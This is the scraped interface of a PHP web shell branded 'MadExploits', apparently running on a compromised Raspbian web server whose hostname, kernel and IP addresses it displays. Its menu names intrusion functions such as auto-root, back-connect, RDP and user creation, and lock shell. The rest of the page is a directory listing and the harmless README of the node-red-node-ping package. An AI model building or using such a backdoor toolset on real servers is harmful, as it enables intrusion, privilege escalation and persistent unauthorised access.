Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
node-red-node-ping /
[ HOME SHELL ]
Name
Size
Permission
Action
locales
[ DIR ]
drwxr-xr-x
88-ping.html
4.45
KB
-rw-r--r--
88-ping.js
10.31
KB
-rw-r--r--
LICENSE
632
B
-rw-r--r--
README.md
1.51
KB
-rw-r--r--
package.json
1.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
node-red-node-ping ================== A <a href="http://nodered.org" target="_new">Node-RED</a> node to ping a remote server, for use as a keep-alive check. Install ------- Either use the Editor - Menu - Manage Palette - Import option or run the following command in your Node-RED user directory - typically `~/.node-red` npm install node-red-node-ping **Gotchas** 1 Ubuntu Snap containers are strict and do not like giving external commands (like ping) external access. To allow ping to work you must manually add the network-observe interface sudo snap connect node-red:network-observe 2 On some versions on Raspbian (Raspberry Pi) `ping` seems to be a root only command. The fix is to allow it as follows sudo setcap cap_net_raw=ep /bin/ping sudo setcap cap_net_raw=ep /bin/ping6 Usage ----- Pings 1 or more devices and returns the trip time in mS as `msg.payload`. Returns boolean `false` if no response received, or if the host is unresolveable. `msg.error` will contain any error message if necessary. `msg.topic` contains the ip address of the target host. There are 2 modes - `Timed` and `Triggered`. * Timed mode - this is the default mode that pings your devices on a timed basis. Default ping is every 20 seconds but can be configured. * Triggered mode - this mode permits you to trigger the ping by an input message. If the `Target` is left blank and `msg.payload` is a string or array, you can ping 1 or more devices on demand. Refer to the built in help on the side-bar info panel for more details.
Close